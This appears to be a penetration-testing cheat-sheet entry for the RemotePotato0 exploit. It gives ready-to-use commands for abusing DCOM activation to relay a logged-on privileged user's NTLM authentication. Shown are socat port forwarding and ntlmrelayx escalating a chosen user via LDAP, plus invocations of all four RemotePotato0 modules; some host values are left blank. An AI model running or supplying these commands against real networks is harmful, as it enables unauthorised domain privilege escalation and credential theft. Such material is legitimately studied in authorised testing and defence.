# RemotePotato ### Exploit Reference: [RemotePotato0](https://github.com/antonioCoco/RemotePotato0) According to the RemotePotato0's README, it abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). We can download the executable from . #### Module 0 (`-m 0`: Rpc2Http cross protocol relay server + potato trigger) ``` # In attack machine sudo socat tcp-listen:135,fork,reuseaddr tcp::9999 & sudo ntlmrelayx.py -t ldap:// --no-wcf-server --escalate-user normal_user # In target machine # -m 0: Module (Rpc2Http cross protocol relay server + potato trigger) # -r: Remote HTTP relay server # -x: Rogue Oxid resolver ip # -p: Rogue Oxid resolver port # -s: Session id for the Cross Session Activation Attack .\RemotePotato0.exe -m 0 -r -x -p 9999 -s 1 ``` #### Module 1 (`-m 1`: Rpc2Http cross protocol relay server) ``` # -l: RPC Relay server listening port .\RemotePotato0.exe -m 1 -l 9997 -r rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm ``` #### Module 2 (`-m 2`: Rpc capture server + potato trigger) ``` query user .\RemotePotato0.exe -m 2 -x -p 9999 -s 1 ``` #### Module 3 (`-m 3`: Rpc capture server) ``` .\RemotePotato0.exe -m 3 -l 9997 rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm ``` ### References * [RemotePotato0](https://github.com/antonioCoco/RemotePotato0)